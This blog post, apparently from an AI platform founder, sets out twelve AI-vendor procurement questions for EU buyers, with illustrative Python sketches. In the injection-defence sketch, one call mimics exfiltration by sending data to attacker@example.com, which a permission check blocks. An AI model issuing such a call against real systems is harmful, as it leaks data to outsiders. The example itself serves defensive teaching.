Compliance · May 26, 2026 · 5 min read

AI Vendor Due Diligence for EU Buyers: 12 Questions That Save You a Year of Pain


TL;DR

12 AI-specific procurement questions every EU buyer should ask before signing: model routing, data residency, PII handling, AI Act classification, audit logs, deprecation, injection defence, training data, no-training commitment, incident response, change management, and exit patterns.

Procurement teams have mature templates for SaaS vendor due diligence: SOC 2, ISO 27001, GDPR Article 28 processor terms, data residency. Those questions still matter, but they are not enough for AI vendors. The AI-specific risks (model provider chains, training data exposure, output liability, model deprecation, EU AI Act conformity) need their own due diligence pass.

These are the 12 questions to add to every AI vendor evaluation, each with what a good answer looks like and what a red-flag answer sounds like.

1. Who are your model providers and what is your routing logic?

A serious AI vendor uses multiple model providers and routes per task. They name the providers (OpenAI, Anthropic, Google, Mistral, plus their own self-hosted options), describe the routing logic per workflow, and let you configure it for your data sensitivity.

Red flag: "We use the best models for the job." That tells you nothing.

Good answer: a sub-processor list per workflow type, a routing policy you can review, and the ability to constrain routing to specific providers or geographies for your data.
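A reviewable routing policy can be as simple as an allow-list that the gateway applies before any model call. The following is a minimal Python sketch, not any vendor's actual implementation; the `Provider` and `RoutingPolicy` types, the provider names, and the region labels are hypothetical placeholders.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Provider:
    name: str    # hypothetical provider identifier
    region: str  # hypothetical region label, e.g. "eu" or "us"


@dataclass(frozen=True)
class RoutingPolicy:
    allowed_providers: frozenset
    allowed_regions: frozenset


def eligible_providers(candidates, policy):
    """Return only the providers the policy permits, preserving order."""
    return [
        p for p in candidates
        if p.name in policy.allowed_providers and p.region in policy.allowed_regions
    ]


candidates = [
    Provider("provider-a", "us"),
    Provider("provider-b", "eu"),
    Provider("self-hosted", "eu"),
]
policy = RoutingPolicy(
    allowed_providers=frozenset({"provider-b", "self-hosted"}),
    allowed_regions=frozenset({"eu"}),
)
routable = eligible_providers(candidates, policy)
```

If the filter returns an empty list, the safer behaviour in this sketch's spirit is to fail the request rather than fall back silently to a provider outside the policy.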

2. What is your data residency story per data category?

Not "we are EU-hosted." Per data category, where does the data live at rest, where does it move in transit, and which sub-processors see it.

Red flag: a single bullet point saying EU-hosted without specifying which infrastructure, which sub-processors, and what happens when a model provider's region is unavailable.

Good answer: a data flow diagram per workflow, named regions, named sub-processors, failover behaviour documented, and the ability to constrain residency per workspace.

3. How is PII detected and handled before reaching third-party models?

For any vendor using third-party LLMs to process your personal data, the detection and redaction (or routing) of PII is the single biggest question for your transfer impact assessment (TIA).

Red flag: "We rely on the model provider's data protection commitments."

Good answer: gateway-side PII detection with measurable precision and recall, redaction or routing rules per data category, and audit log entries showing the redaction operation per prompt.
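To make "measurable precision and recall" concrete, here is a deliberately small Python sketch. It assumes a regex detector for email addresses only, which is far narrower than a production PII detector; `redact_emails`, `precision_recall`, and the `[EMAIL]` placeholder token are hypothetical names chosen for illustration.

```python
import re

# Simplified email pattern; real PII detection covers many more categories.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def redact_emails(prompt):
    """Return the redacted prompt and the list of values that were removed."""
    found = EMAIL_RE.findall(prompt)
    redacted = EMAIL_RE.sub("[EMAIL]", prompt)
    return redacted, found


def precision_recall(detected, labelled):
    """Compare detector output against a hand-labelled set of PII values."""
    detected, labelled = set(detected), set(labelled)
    true_positives = len(detected & labelled)
    precision = true_positives / len(detected) if detected else 1.0
    recall = true_positives / len(labelled) if labelled else 1.0
    return precision, recall


redacted, found = redact_emails("Contact jan@example.com today")
scores = precision_recall(detected=["a", "b"], labelled=["a", "c"])
```

A vendor with a good answer can report figures like these per data category, measured on a labelled evaluation set, rather than asserting that redaction "works".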

4. What is your EU AI Act risk classification posture?

The vendor should know whether their system is high-risk under Annex III (listed use cases) or Annex I (products covered by EU harmonisation legislation), whether you (the deployer) inherit obligations, and what conformity assessment work they have done.

Red flag: "We are working on it" or "The AI Act doesn't really apply to us."

Good answer: a classification analysis per use case the vendor enables, the conformity assessment status (planned, in progress, completed) where applicable, the technical documentation file structure, and the deployer guidance that helps you with your own obligations.

5. What audit-log evidence do you produce per inference?

For both AI Act Article 12 record-keeping and your own GDPR accountability, the audit log content matters.

Red flag: "We log API calls."

Good answer: per-inference records with timestamp, input (or PII-redacted hash of input), prompt template version, model and version, output, the human approval or override, retention policy, and export format. See our Article 12 logging guide for the full content checklist.
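The fields listed above map naturally onto a structured record. The sketch below is one possible shape in Python, not a format the AI Act prescribes; `InferenceRecord`, `make_record`, `export_jsonl`, and all example values are hypothetical.

```python
import hashlib
import json
from dataclasses import asdict, dataclass
from datetime import datetime, timezone
from typing import Optional


@dataclass(frozen=True)
class InferenceRecord:
    timestamp: str                 # UTC, ISO 8601
    input_sha256: str              # hash of the PII-redacted input
    prompt_template_version: str
    model: str
    model_version: str
    output: str
    human_decision: Optional[str]  # e.g. "approved", "overridden", or None
    retention_days: int


def make_record(redacted_input, prompt_template_version, model, model_version,
                output, human_decision, retention_days):
    """Build one audit record; the raw input is hashed, never stored."""
    digest = hashlib.sha256(redacted_input.encode("utf-8")).hexdigest()
    return InferenceRecord(
        timestamp=datetime.now(timezone.utc).isoformat(),
        input_sha256=digest,
        prompt_template_version=prompt_template_version,
        model=model,
        model_version=model_version,
        output=output,
        human_decision=human_decision,
        retention_days=retention_days,
    )


def export_jsonl(records):
    """Serialise records as JSON Lines, one record per line."""
    return "\n".join(json.dumps(asdict(r), sort_keys=True) for r in records)


record = make_record(
    "Summarise ticket from [EMAIL]", "support-summary@3",
    "example-model", "2026-01", "Customer asks for a refund.",
    "approved", 180,
)
exported = export_jsonl([record])
```

JSON Lines is used here only because it is easy to stream and diff; the export format a vendor actually offers is something to confirm in the RFI.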

6. How do you handle model deprecation?

Model providers deprecate models. Your vendor's agents are tuned to specific models. When the model goes away, what happens to the agent?

Red flag: "We will figure it out when it happens."

Good answer: a documented deprecation handling process, a model abstraction layer that allows substitution without rewriting agents, prior experience with deprecations (the vendor names them and describes how they handled them), and a notice period to you for any deprecation that affects your workflows.
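One common way to build such an abstraction layer is to have agents reference a stable alias instead of a concrete model identifier. The Python sketch below illustrates the idea under that assumption; `ModelRegistry`, the alias, and the model identifiers are hypothetical and do not refer to real models.

```python
class ModelRegistry:
    """Maps stable aliases used by agents to concrete model identifiers."""

    def __init__(self):
        self._aliases = {}
        self.history = []  # (alias, previous_model, new_model) for auditing

    def bind(self, alias, model_id):
        """Point an alias at a model and record the substitution."""
        previous = self._aliases.get(alias)
        self._aliases[alias] = model_id
        self.history.append((alias, previous, model_id))

    def resolve(self, alias):
        """Return the concrete model currently behind an alias."""
        return self._aliases[alias]


registry = ModelRegistry()
registry.bind("summariser", "vendor-x/model-v1")

# The agent definition only ever refers to the alias.
agent = {"name": "ticket-summary", "model_alias": "summariser"}
before = registry.resolve(agent["model_alias"])

# When model-v1 is deprecated, the vendor rebinds the alias; the agent is untouched.
registry.bind("summariser", "vendor-x/model-v2")
after = registry.resolve(agent["model_alias"])
```

Substitution without rewriting the agent does not remove the need to re-evaluate its behaviour on the new model, which is why the notice period matters.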

7. What is your prompt and tool injection defence?

Agentic systems that can be tricked into running unintended actions are a real risk, especially agents with tool access (writing to systems, sending messages, executing code).

Red flag: "Our prompts are robust" with no specifics.

Good answer: documented defence layers (prompt isolation, output validation, tool access controls, content moderation, anomaly detection), a published responsible disclosure program, and recent test results from internal or external red-teaming.
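Of the layers listed above, tool access control is the easiest to illustrate. The Python sketch below shows a deny-by-default allow-list per agent; it covers only that one layer, and `call_tool`, `ToolNotPermitted`, the agent name, and the tools are hypothetical.

```python
class ToolNotPermitted(Exception):
    """Raised when an agent requests a tool outside its allow-list."""


def call_tool(permissions, tools, agent, tool_name, **kwargs):
    """Run a tool only if the agent is explicitly allowed to use it."""
    allowed = permissions.get(agent, frozenset())  # unknown agents get nothing
    if tool_name not in allowed:
        raise ToolNotPermitted(f"{agent} may not call {tool_name}")
    return tools[tool_name](**kwargs)


def search_kb(query):
    return f"results for {query}"


def send_email(to, body):
    return f"sent to {to}"


tools = {"search_kb": search_kb, "send_email": send_email}
permissions = {"support-agent": frozenset({"search_kb"})}

result = call_tool(permissions, tools, "support-agent", "search_kb", query="refund")

try:
    # An injected instruction asking the agent to send mail is refused here,
    # regardless of what the model output says.
    call_tool(permissions, tools, "support-agent", "send_email",
              to="attacker@example.com", body="data")
    blocked = False
except ToolNotPermitted:
    blocked = True
```

The point of the design is that the check runs outside the model: a successful prompt injection can change what the agent asks for, but not what it is permitted to do.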

8. What is the training data provenance for models you operate?

For self-hosted models or fine-tunes the vendor provides, the training data provenance affects your copyright exposure and your bias profile.

Red flag: vague answers about "publicly available data."

Good answer: documented training data sources, opt-out compliance status, licence audit, and the bias evaluation methodology the vendor uses. This is less applicable if the vendor only routes to third-party models and more critical if they ship their own.

9. How do you handle customer data in training?

Your data should not train someone else's model unless you explicitly opted in. This is a common gotcha in the standard terms.

Red flag: silence on this in the DPA, or an opt-out buried in a sub-clause.

Good answer: explicit no-training-on-customer-data commitment as a default, opt-in (not opt-out) for any use of customer data in model improvement, and audit rights to verify.

10. What does your incident response look like for AI-specific incidents?

Standard cyber incident response is well-defined. AI-specific incidents (prompt injection that exfiltrates data, model hallucination causing material harm to a customer, bias issues surfaced in production) have their own response patterns.

Red flag: AI incidents handled by the generic incident response with no AI-specific runbook.

Good answer: AI-specific incident classification, a runbook that includes model rollback / disable, customer notification timeline, regulator notification triggers under the AI Act, and post-incident reporting.

11. What is your model versioning and change-management practice?

When the vendor updates a model or a prompt, what changes do you see? When is your DPIA or conformity assessment invalidated?

Red flag: "We continuously improve our models" with no notification practice.

Good answer: documented versioning of models and prompts, change notifications to customers for material changes, change classification (immaterial vs material), and the policy that gives you time to re-assess before a material change rolls out.
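A change-management policy of this kind can be expressed as two small rules: how a change is classified, and how long customers get before a material change ships. The Python sketch below assumes a deliberately crude classification rule and a contractual notice period passed in as a parameter; both are illustrative assumptions, and the names are hypothetical.

```python
from datetime import date, timedelta
from enum import Enum


class ChangeClass(Enum):
    IMMATERIAL = "immaterial"
    MATERIAL = "material"


def classify_change(model_changed, prompt_behaviour_changed):
    """Assumed rule: any model swap or behaviour-changing prompt edit is material."""
    if model_changed or prompt_behaviour_changed:
        return ChangeClass.MATERIAL
    return ChangeClass.IMMATERIAL


def earliest_rollout(announced_on, change_class, notice_days):
    """Material changes wait out the notice period; immaterial ones do not."""
    if change_class is ChangeClass.MATERIAL:
        return announced_on + timedelta(days=notice_days)
    return announced_on


change = classify_change(model_changed=True, prompt_behaviour_changed=False)
rollout = earliest_rollout(date(2026, 6, 1), change, notice_days=30)
```

What counts as material, and how many days of notice you get, are exactly the terms to pin down in the contract rather than leave to the vendor's discretion.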

12. What is your exit pattern?

Can you get your data out, including the agent definitions and audit logs, in a usable format if you leave?

Red flag: data exports limited to the agent outputs, no export of the agent definitions or knowledge base.

Good answer: documented data portability covering customer data, agent definitions, knowledge base content, audit logs, and the export format and timeline. Plus a transition plan that does not leave you stranded.
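During a trial export, a buyer can check completeness mechanically. The Python sketch below assumes the vendor delivers a manifest mapping each category to a list of files; the manifest shape, category keys, and file names are hypothetical.

```python
# The four categories named in the good answer above, as hypothetical manifest keys.
REQUIRED_CATEGORIES = (
    "customer_data",
    "agent_definitions",
    "knowledge_base",
    "audit_logs",
)


def missing_categories(manifest):
    """Return required categories that are absent or empty in the export."""
    return [c for c in REQUIRED_CATEGORIES if not manifest.get(c)]


# An export that matches the red flag: outputs only, no definitions or knowledge base.
manifest = {
    "customer_data": ["outputs.jsonl"],
    "audit_logs": ["audit-2026.jsonl"],
    "knowledge_base": [],
}
gaps = missing_categories(manifest)
```

Running a check like this before signing, on a sandbox workspace, is cheaper than discovering the gap at termination.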

How to use the 12 questions

Send them in the RFI. The answers tell you two things: whether the vendor has thought about AI-specific risks, and whether they have built the controls or are bluffing. A vendor that struggles with these questions in 2026 is a vendor whose product was built before the regulatory landscape shifted; they may catch up, but their roadmap is the risk you are buying.

The vendors who answer well will not be the cheapest. They will be the ones whose contract you actually sign without a six-month security and compliance negotiation, and whose system survives your first regulator inspection without rework.

About the author

Erwin Berkouwer · Founder, AgentWorks

Erwin Berkouwer is the founder of AgentWorks — an AI agent platform purpose-built for European teams that need EU AI Act-ready governance, multi-LLM choice across OpenAI, Anthropic, Google and Mistral, and transparent per-token € pricing.
